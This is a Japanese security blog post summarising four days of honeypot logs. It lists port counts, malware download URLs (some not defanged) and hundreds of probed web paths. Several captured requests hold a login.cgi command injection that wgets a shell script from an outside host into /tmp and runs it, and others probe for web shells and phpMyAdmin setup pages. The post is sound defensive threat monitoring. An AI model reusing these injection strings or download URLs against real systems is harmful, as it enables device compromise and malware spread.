ハニーポット簡易分析(26-29日目:9/2-9/6)

更新が滞ってしまいましたが、ここ数日分の簡易分析を書きたいと思います。

1.Honeytrap

<宛先ごとにおける検知数>

日付：9/3 件数：3801件			日付：9/4 件数：4699件
宛先ポート	件数	割合	宛先ポート	件数	割合
445	1,894	49.83%	445	2,235	45.01%
3389	78	2.05%	1433	77	1.55%
52869	65	1.71%	5006	64	1.29%
1433	58	1.53%	37777	60	1.21%
81	42	1.11%	52869	51	1.03%
8080	36	0.95%	8080	50	1.01%
9944	33	0.87%	3389	37	0.75%
8088	17	0.45%	25	33	0.66%
8564	15	0.40%	771	32	0.64%
5555	14	0.37%	5555	30	0.60%
日付：9/5 件数：5399件			日付：9/6 件数：3971件
宛先ポート	件数	割合	宛先ポート	件数	割合
445	2,073	38.40%	445	2,115	53.26%
2022	475	8.80%	3389	76	1.91%
6022	64	1.19%	1433	72	1.81%
3389	61	1.13%	10001	64	1.61%
1433	60	1.11%	81	51	1.28%
81	53	0.98%	52869	48	1.21%
52869	48	0.89%	4899	39	0.98%
25	37	0.69%	587	34	0.86%
8080	33	0.61%	8080	33	0.83%
8069	32	0.59%	4443	32	0.81%

日付	マルウェアダウンロード先	検知数
9月3日	hxxp://107[.]191[.]99[.]41/elf[.]mips	30
9月3日	hxxp://138[.]68[.]21[.]15/oxy[.]mips	2
9月3日	hxxp://185[.]10[.]68[.]127/rtbin	4
9月3日	hxxp://207[.]148[.]78[.]152/bc	4
9月3日	hxxp://27[.]102[.]115[.]44/adbs2	9
9月3日	hxxp://77[.]87[.]77[.]250/izuku[.]mips	14
9月3日	hxxp://95[.]215[.]62[.]169/adbs	1
9月4日	hxxp://107[.]191[.]99[.]41/elf[.]mips	9
9月4日	hxxp://138[.]68[.]21[.]15/tenshimips[.]mips	11
9月4日	hxxp://148[.]72[.]176[.]78/ngynx	1
9月4日	hxxp://176[.]32[.]33[.]171/kenjiro[.]mips	1
9月4日	hxxp://77[.]87[.]77[.]250/izuku[.]mips	11
9月4日	hxxp://80[.]211[.]112[.]150/mips	1
9月4日	hxxp://80[.]211[.]173[.]159/mips	2
9月5日	hxxp://107[.]191[.]99[.]41/elf[.]mips	11
9月5日	hxxp://138[.]68[.]21[.]15/tenshimips[.]mips	24
9月5日	hxxp://148[.]72[.]176[.]78/ngynx	1
9月5日	hxxp://27[.]102[.]115[.]44/adbs2	2
9月5日	hxxp://77[.]246[.]157[.]180/c	1
9月5日	hxxp://77[.]87[.]77[.]250/izuku[.]mips	7
9月6日	hxxp://107[.]191[.]99[.]41/elf[.]mips	12
9月6日	hxxp://138[.]68[.]21[.]15/tenshimips[.]mips	5
9月6日	hxxp://185[.]62[.]189[.]149/adbs2	2
9月6日	hxxp://207[.]148[.]78[.]152/bc	1
9月6日	hxxp://27[.]102[.]115[.]44/adbs2	4
9月6日	hxxp://77[.]87[.]77[.]250/izuku[.]mips	14

変わらず、IoT系のマルウェアが多いですね。ちょくちょく、パス部分は変わっているので中身が少し変化しているかもしれません。

2.WoWHoneypot

@research.aegis.networkのパスに対して、アクセスが来てました。内容は調査行為でした。
WoWHoneypot マルウェアダウンロード先

http://148.72.176.78/ken.sh

http://77.87.77.250/izuku.sh

http://80.211.112.150/k

http://148.72.176.78/ngynx

http://77.73.69.246/dl

WoWHoneypot 検知パス

日付	メソッド	URLパス
9月3日	CONNECT	cn.bing[.]com:443
9月3日	CONNECT	www.baidu[.]com:443
9月3日	GET	/
9月3日	GET	/MyAdmin/scripts/setup.php
9月3日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月3日	GET	/login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
9月3日	GET	/login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
9月3日	GET	/manager/html
9月3日	GET	/phpMyAdmin/scripts/setup.php
9月3日	GET	/pma/scripts/setup.php
9月3日	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)
9月3日	GET	/web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr
9月3日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月3日	GET	hxxp://www.ip.cn/
9月3日	OPTIONS	/C$
9月3日	PROPFIND	/C$
9月3日	PROPFIND	/Users
9月4日	GET	/
9月4日	GET	/HNAP1/
9月4日	GET	/_query.php
9月4日	GET	/appserv.php
9月4日	GET	/ccvv
9月4日	GET	/cmd.php
9月4日	GET	/cmdd.php
9月4日	GET	/cmv.php
9月4日	GET	/cmx.php
9月4日	GET	/db_cts.php
9月4日	GET	/db_pma.php
9月4日	GET	/desktop.ini.php
9月4日	GET	/hell.php
9月4日	GET	/help-e.php
9月4日	GET	/help.php
9月4日	GET	/java.php
9月4日	GET	/knal.php
9月4日	GET	/lala-dpr.php
9月4日	GET	/lala.php
9月4日	GET	/license.php
9月4日	GET	/log.php
9月4日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月4日	GET	/logon.php
9月4日	GET	/lol.php
9月4日	GET	/muhstik-dpr.php
9月4日	GET	/muhstik.php
9月4日	GET	/muhstik2.php
9月4日	GET	/muhstiks.php
9月4日	GET	/pmd_online.php
9月4日	GET	/shell.php
9月4日	GET	/test.php
9月4日	GET	/text.php
9月4日	GET	/uploader.php
9月4日	GET	/webdav/
9月4日	GET	/wp-config.php
9月4日	GET	/wpo.php
9月4日	GET	/x.php
9月4日	GET	/z.php
9月4日	POST	/12.php
9月4日	POST	/1213.php
9月4日	POST	/3.php
9月4日	POST	/56.php
9月4日	POST	/9510.php
9月4日	POST	/9678.php
9月4日	POST	/aaaa.php
9月4日	POST	/ak.php
9月4日	POST	/ak47.php
9月4日	POST	/ak48.php
9月4日	POST	/angge.php
9月4日	POST	/aotu.php
9月4日	POST	/app.php
9月4日	POST	/aw.php
9月4日	POST	/bak.php
9月4日	POST	/cainiao.php
9月4日	POST	/ceshi.php
9月4日	POST	/cmd.php
9月4日	POST	/conflg.php
9月4日	POST	/data.php
9月4日	POST	/db__.init.php
9月4日	POST	/db_dataml.php
9月4日	POST	/db_desql.php
9月4日	POST	/db_session.init.php
9月4日	POST	/default.php
9月4日	POST	/defect.php
9月4日	POST	/fack.php
9月4日	POST	/feixiang.php
9月4日	POST	/h1.php
9月4日	POST	/help.php
9月4日	POST	/hh.php
9月4日	POST	/hm.php
9月4日	POST	/infoo.php
9月4日	POST	/ip.php
9月4日	POST	/l7.php
9月4日	POST	/l8.php
9月4日	POST	/lindex.php
9月4日	POST	/linuxse.php
9月4日	POST	/log.php
9月4日	POST	/m.php?pbid=open
9月4日	POST	/min.php
9月4日	POST	/mx.php
9月4日	POST	/mz.php
9月4日	POST	/pe.php
9月4日	POST	/phpStudy.php
9月4日	POST	/phpinfi.php
9月4日	POST	/post.php
9月4日	POST	/python.php
9月4日	POST	/q.php
9月4日	POST	/qaq.php
9月4日	POST	/qq.php
9月4日	POST	/qwe.php
9月4日	POST	/s.php
9月4日	POST	/sean.php
9月4日	POST	/sheep.php
9月4日	POST	/ssaa.php
9月4日	POST	/system.php
9月4日	POST	/test.php
9月4日	POST	/tiandi.php
9月4日	POST	/w.php
9月4日	POST	/wan.php
9月4日	POST	/wanan.php
9月4日	POST	/wc.php
9月4日	POST	/webslee.php
9月4日	POST	/weixiao.php
9月4日	POST	/wp-admins.php
9月4日	POST	/wshell.php
9月4日	POST	/wuwu11.php
9月4日	POST	/xiao.php
9月4日	POST	/xiaoma.php
9月4日	POST	/xiaomae.php
9月4日	POST	/xiaomar.php
9月4日	POST	/xshell.php
9月4日	POST	/xw.php
9月4日	POST	/xw1.php
9月4日	POST	/xx.php
9月4日	POST	/xz.php
9月4日	POST	/yao.php
9月4日	POST	/yumo.php
9月4日	POST	/zshmindex.php
9月4日	POST	/zuo.php
9月4日	POST	/zuoindex.php
9月4日	POST	/zuoshou.php
9月4日	PROPFIND	/
9月5日	GET	/
9月5日	GET	/_query.php
9月5日	GET	/admin/assets/js/views/login.js
9月5日	GET	/appserv.php
9月5日	GET	/cmd.php
9月5日	GET	/cmdd.php
9月5日	GET	/cmv.php
9月5日	GET	/cmx.php
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/cmx.php?cmd=ec+A:C+D6
9月5日	GET	/db_cts.php
9月5日	GET	/db_pma.php
9月5日	GET	/desktop.ini.php
9月5日	GET	/hell.php
9月5日	GET	/help-e.php
9月5日	GET	/help.php
9月5日	GET	/java.php
9月5日	GET	/knal.php
9月5日	GET	/lala-dpr.php
9月5日	GET	/lala.php
9月5日	GET	/license.php
9月5日	GET	/log.php
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日	GET	/logon.php
9月5日	GET	/lol.php
9月5日	GET	/muhstik-dpr.php
9月5日	GET	/muhstik.php
9月5日	GET	/muhstik2.php
9月5日	GET	/muhstiks.php
9月5日	GET	/pmd_online.php
9月5日	GET	/shell.php
9月5日	GET	/test.php
9月5日	GET	/text.php
9月5日	GET	/uploader.php
9月5日	GET	/webdav/
9月5日	GET	/wp-config.php
9月5日	GET	/wpo.php
9月5日	GET	/x.php
9月5日	GET	/z.php
9月5日	POST	/12.php
9月5日	POST	/1213.php
9月5日	POST	/3.php
9月5日	POST	/56.php
9月5日	POST	/9510.php
9月5日	POST	/9678.php
9月5日	POST	/aaaa.php
9月5日	POST	/ak.php
9月5日	POST	/ak47.php
9月5日	POST	/ak48.php
9月5日	POST	/angge.php
9月5日	POST	/aotu.php
9月5日	POST	/app.php
9月5日	POST	/aw.php
9月5日	POST	/bak.php
9月5日	POST	/cainiao.php
9月5日	POST	/ceshi.php
9月5日	POST	/cmd.php
9月5日	POST	/cmx.php
9月5日	POST	/conflg.php
9月5日	POST	/data.php
9月5日	POST	/db.init.php
9月5日	POST	/db__.init.php
9月5日	POST	/db_dataml.php
9月5日	POST	/db_desql.php
9月5日	POST	/db_session.init.php
9月5日	POST	/default.php
9月5日	POST	/defect.php
9月5日	POST	/fack.php
9月5日	POST	/feixiang.php
9月5日	POST	/h1.php
9月5日	POST	/help.php
9月5日	POST	/hh.php
9月5日	POST	/hm.php
9月5日	POST	/images.php
9月5日	POST	/infoo.php
9月5日	POST	/ip.php
9月5日	POST	/l7.php
9月5日	POST	/l8.php
9月5日	POST	/lindex.php
9月5日	POST	/linuxse.php
9月5日	POST	/log.php
9月5日	POST	/m.php?pbid=open
9月5日	POST	/min.php
9月5日	POST	/mx.php
9月5日	POST	/mz.php
9月5日	POST	/pe.php
9月5日	POST	/phpStudy.php
9月5日	POST	/phpinfi.php
9月5日	POST	/post.php
9月5日	POST	/python.php
9月5日	POST	/q.php
9月5日	POST	/qaq.php
9月5日	POST	/qq.php
9月5日	POST	/qwe.php
9月5日	POST	/s.php
9月5日	POST	/sean.php
9月5日	POST	/sheep.php
9月5日	POST	/ssaa.php
9月5日	POST	/system.php
9月5日	POST	/test.php
9月5日	POST	/tiandi.php
9月5日	POST	/w.php
9月5日	POST	/wan.php
9月5日	POST	/wanan.php
9月5日	POST	/wc.php
9月5日	POST	/webslee.php
9月5日	POST	/weixiao.php
9月5日	POST	/wp-admins.php
9月5日	POST	/wshell.php
9月5日	POST	/wuwu11.php
9月5日	POST	/xiao.php
9月5日	POST	/xiaoma.php
9月5日	POST	/xiaomae.php
9月5日	POST	/xiaomar.php
9月5日	POST	/xshell.php
9月5日	POST	/xw.php
9月5日	POST	/xw1.php
9月5日	POST	/xx.php
9月5日	POST	/xz.php
9月5日	POST	/yao.php
9月5日	POST	/yumo.php
9月5日	POST	/zshmindex.php
9月5日	POST	/zuo.php
9月5日	POST	/zuoindex.php
9月5日	POST	/zuoshou.php
9月5日	PROPFIND	/
9月6日	GET	/
9月6日	GET	/1AS/index.jsp
9月6日	GET	/1q/index.jsp
9月6日	GET	/2323633/index.jsp
9月6日	GET	/51/index.jsp
9月6日	GET	/511/index.jsp
9月6日	GET	/5211111111111/index.jsp
9月6日	GET	/AAAAAAAAAAAAAAAAAAAAuper/index.jsp
9月6日	GET	/Anzzpo/index.jsp
9月6日	GET	/Aqwe/index.jsp
9月6日	GET	/CluJaNul/index.jsp
9月6日	GET	/EWFQ/index.jsp
9月6日	GET	/FA/index.jsp
9月6日	GET	/Fendou/index.jsp
9月6日	GET	/Fido/index.jsp
9月6日	GET	/JSP/index.jsp
9月6日	GET	/JuLiAn/index.jsp
9月6日	GET	/Liutao/index.jsp
9月6日	GET	/Memory/index.jsp
9月6日	GET	/Micrsyse2m/index.jsp
9月6日	GET	/MyAdmin/scripts/setup.php
9月6日	GET	/Mytomcat/index.jsp
9月6日	GET	/PMA/index.php
9月6日	GET	/PMA2/index.php
9月6日	GET	/QQ374666283/index.jsp
9月6日	GET	/QQ443076142/index.jsp
9月6日	GET	/QQ563332298AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/index.jsp
9月6日	GET	/QQ727095531/index.jsp
9月6日	GET	/QQPP/index.jsp
9月6日	GET	/SQLL/index.jsp
9月6日	GET	/Tomcatmansagxesaasxsas/index.jsp
9月6日	GET	/Xs/index.jsp
9月6日	GET	/_query.php
9月6日	GET	/admin/PMA/index.php
9月6日	GET	/admin/assets/js/views/login.js
9月6日	GET	/admin/index.php
9月6日	GET	/admin/mysql/index.php
9月6日	GET	/admin/mysql2/index.php
9月6日	GET	/admin/phpMyAdmin/index.php
9月6日	GET	/admin/phpmyadmin2/index.php
9月6日	GET	/ak/index.jsp
9月6日	GET	/apach/index.jsp
9月6日	GET	/apache-tomcat/index.jsp
9月6日	GET	/apache-web/index.jsp
9月6日	GET	/appserv.php
9月6日	GET	/apptor/index.jsp
9月6日	GET	/asd/index.jsp
9月6日	GET	/black/index.jsp
9月6日	GET	/chaochao/index.jsp
9月6日	GET	/china/index.jsp
9月6日	GET	/chuan/index.jsp
9月6日	GET	/claroline/phpMyAdmin/index.php
9月6日	GET	/cmd.php
9月6日	GET	/cmd/index.jsp
9月6日	GET	/cmd2/index.jsp
9月6日	GET	/cmdd.php
9月6日	GET	/cmv.php
9月6日	GET	/cmx.php
9月6日	GET	/cwx/index.jsp
9月6日	GET	/dan/index.jsp
9月6日	GET	/db/index.php
9月6日	GET	/db_cts.php
9月6日	GET	/db_pma.php
9月6日	GET	/dbadmin/index.php
9月6日	GET	/desktop.ini.php
9月6日	GET	/dingfan/index.jsp
9月6日	GET	/dream/index.jsp
9月6日	GET	/emperor/index.jsp
9月6日	GET	/emperor3/index.jsp
9月6日	GET	/f4ck/index.jsp
9月6日	GET	/feng/index.jsp
9月6日	GET	/fuckxue/index.jsp
9月6日	GET	/goc-vpn/index.jsp
9月6日	GET	/gxjsp/index.jsp
9月6日	GET	/hacks/index.jsp
9月6日	GET	/hcskk/index.jsp
9月6日	GET	/hell.php
9月6日	GET	/help-e.php
9月6日	GET	/help.php
9月6日	GET	/host-mana/index.jsp
9月6日	GET	/ht/index.jsp
9月6日	GET	/hua/index.jsp
9月6日	GET	/iesvc/index.jsp
9月6日	GET	/index.php
9月6日	GET	/java.php
9月6日	GET	/javi/index.jsp
9月6日	GET	/javi100/index.jsp
9月6日	GET	/jc/index.jsp
9月6日	GET	/jo3/index.jsp
9月6日	GET	/king/index.jsp
9月6日	GET	/knal.php
9月6日	GET	/koko/index.jsp
9月6日	GET	/lala-dpr.php
9月6日	GET	/lala.php
9月6日	GET	/license.php
9月6日	GET	/lincogo/index.jsp
9月6日	GET	/log.php
9月6日	GET	/login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
9月6日	GET	/logon.php
9月6日	GET	/lol.php
9月6日	GET	/looky/index.jsp
9月6日	GET	/manager/html
9月6日	GET	/maque6695940/index.jsp
9月6日	GET	/maque66959401/index.jsp
9月6日	GET	/memimi/index.jsp
9月6日	GET	/muhstik-dpr.php
9月6日	GET	/muhstik.php
9月6日	GET	/muhstik2.php
9月6日	GET	/muhstiks.php
9月6日	GET	/myadmin/index.php
9月6日	GET	/myadmin2/index.php
9月6日	GET	/mysql-admin/index.php
9月6日	GET	/mysql/index.php
9月6日	GET	/mysql/scripts/setup.php
9月6日	GET	/mysqladmin/index.php
9月6日	GET	/mysqladmin/scripts/setup.php
9月6日	GET	/mzy/index.jsp
9月6日	GET	/osu/index.jsp
9月6日	GET	/phpMyAdmin.old/index.php
9月6日	GET	/phpMyAdmin/index.php
9月6日	GET	/phpMyAdmin/phpMyAdmin/index.php
9月6日	GET	/phpMyAdmin/scripts/setup.php
9月6日	GET	/phpMyAdminold/index.php
9月6日	GET	/phpMyadmin_bak/index.php
9月6日	GET	/phpadmin/index.php
9月6日	GET	/phpma/index.php
9月6日	GET	/phpmyadmin-old/index.php
9月6日	GET	/phpmyadmin0/index.php
9月6日	GET	/phpmyadmin1/index.php
9月6日	GET	/phpmyadmin2/index.php
9月6日	GET	/piaomiao111/index.jsp
9月6日	GET	/pma-old/index.php
9月6日	GET	/pma/scripts/setup.php
9月6日	GET	/pmamy/index.php
9月6日	GET	/pmamy2/index.php
9月6日	GET	/pmd/index.php
9月6日	GET	/pmd_online.php
9月6日	GET	/private/index.jsp
9月6日	GET	/qidai/index.jsp
9月6日	GET	/qjhq/index.jsp
9月6日	GET	/rf/index.jsp
9月6日	GET	/rrr/index.jsp
9月6日	GET	/rte/index.jsp
9月6日	GET	/safe/index.jsp
9月6日	GET	/safe2/index.jsp
9月6日	GET	/safee/index.jsp
9月6日	GET	/safepp/index.jsp
9月6日	GET	/scripts/setup.php
9月6日	GET	/servletc-eavmple/index.jsp
9月6日	GET	/shell.php
9月6日	GET	/shijian/index.jsp
9月6日	GET	/shl/index.jsp
9月6日	GET	/soft/index.jsp
9月6日	GET	/supsz/index.jsp
9月6日	GET	/synsuper/index.jsp
9月6日	GET	/synsupesssssssssssssssr/index.jsp
9月6日	GET	/sysadmin/index.jsp
9月6日	GET	/system/index.jsp
9月6日	GET	/system2/index.jsp
9月6日	GET	/systems/index.jsp
9月6日	GET	/tao/index.jsp
9月6日	GET	/taoge/index.jsp
9月6日	GET	/temps/index.jsp
9月6日	GET	/test.php
9月6日	GET	/text.php
9月6日	GET	/tomcat-5.5.26/index.jsp
9月6日	GET	/tools/phpMyAdmin/index.php
9月6日	GET	/typo3/phpmyadmin/index.php
9月6日	GET	/uploader.php
9月6日	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)
9月6日	GET	/wangbaba110/index.jsp
9月6日	GET	/wavce/index.jsp
9月6日	GET	/web/phpMyAdmin/index.php
9月6日	GET	/webd/index.jsp
9月6日	GET	/webdav/
9月6日	GET	/webdax/index.jsp
9月6日	GET	/webdoc/index.jsp
9月6日	GET	/webex/index.jsp
9月6日	GET	/webshell/index.jsp
9月6日	GET	/wholove/index.jsp
9月6日	GET	/win/index.jsp
9月6日	GET	/win88/index.jsp
9月6日	GET	/wo/index.jsp
9月6日	GET	/wp-config.php
9月6日	GET	/wpo.php
9月6日	GET	/ww/index.jsp
9月6日	GET	/www/phpMyAdmin/index.php
9月6日	GET	/x.php
9月6日	GET	/xampp/phpmyadmin/index.php
9月6日	GET	/xhzz/index.jsp
9月6日	GET	/xiaodama/index.jsp
9月6日	GET	/xiaohui/index.jsp
9月6日	GET	/xiaomo/index.jsp
9月6日	GET	/xiaon/index.jsp
9月6日	GET	/xiaowu/index.jsp
9月6日	GET	/xiaozhe/index.jsp
9月6日	GET	/xinsui/index.jsp
9月6日	GET	/z.php
9月6日	GET	/zhu/index.jsp
9月6日	GET	/zman/index.jsp
9月6日	GET	/zxc/index.jsp
9月6日	GET	@research.aegis.network/
9月6日	HEAD	hxxp://180.163.113[.]82/check_proxy
9月6日	OPTIONS	*
9月6日	POST	/12.php
9月6日	POST	/1213.php
9月6日	POST	/3.php
9月6日	POST	/56.php
9月6日	POST	/9510.php
9月6日	POST	/9678.php
9月6日	POST	/aaaa.php
9月6日	POST	/ak.php
9月6日	POST	/ak47.php
9月6日	POST	/ak48.php
9月6日	POST	/angge.php
9月6日	POST	/aotu.php
9月6日	POST	/app.php
9月6日	POST	/aw.php
9月6日	POST	/bak.php
9月6日	POST	/boots.php
9月6日	POST	/cainiao.php
9月6日	POST	/ceshi.php
9月6日	POST	/cmd.php
9月6日	POST	/conflg.php
9月6日	POST	/data.php
9月6日	POST	/db.init.php
9月6日	POST	/db__.init.php
9月6日	POST	/db_dataml.php
9月6日	POST	/db_desql.php
9月6日	POST	/db_session.init.php
9月6日	POST	/default.php
9月6日	POST	/defect.php
9月6日	POST	/fack.php
9月6日	POST	/feixiang.php
9月6日	POST	/h1.php
9月6日	POST	/help.php
9月6日	POST	/hh.php
9月6日	POST	/hm.php
9月6日	POST	/infoo.php
9月6日	POST	/ip.php
9月6日	POST	/l6.php
9月6日	POST	/l7.php
9月6日	POST	/l8.php
9月6日	POST	/lindex.php
9月6日	POST	/linuxse.php
9月6日	POST	/log.php
9月6日	POST	/m.php?pbid=open
9月6日	POST	/miao.php
9月6日	POST	/min.php
9月6日	POST	/mx.php
9月6日	POST	/mz.php
9月6日	POST	/pe.php
9月6日	POST	/phpStudy.php
9月6日	POST	/phpinfi.php
9月6日	POST	/post.php
9月6日	POST	/python.php
9月6日	POST	/q.php
9月6日	POST	/qaq.php
9月6日	POST	/qq.php
9月6日	POST	/qwe.php
9月6日	POST	/s.php
9月6日	POST	/sean.php
9月6日	POST	/she.php
9月6日	POST	/sheep.php
9月6日	POST	/ssaa.php
9月6日	POST	/system.php
9月6日	POST	/test.php
9月6日	POST	/tiandi.php
9月6日	POST	/w.php
9月6日	POST	/wan.php
9月6日	POST	/wanan.php
9月6日	POST	/wc.php
9月6日	POST	/webslee.php
9月6日	POST	/weixiao.php
9月6日	POST	/wp-admins.php
9月6日	POST	/wshell.php
9月6日	POST	/wuwu11.php
9月6日	POST	/xiao.php
9月6日	POST	/xiaoma.php
9月6日	POST	/xiaomae.php
9月6日	POST	/xiaomar.php
9月6日	POST	/xshell.php
9月6日	POST	/xw.php
9月6日	POST	/xw1.php
9月6日	POST	/xx.php
9月6日	POST	/xz.php
9月6日	POST	/yao.php
9月6日	POST	/yumo.php
9月6日	POST	/zshmindex.php
9月6日	POST	/zuo.php
9月6日	POST	/zuoindex.php
9月6日	POST	/zuoshou.php
9月6日	PROPFIND	/

以上、簡易分析でした。

sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(26-29日目:9/2-9/6)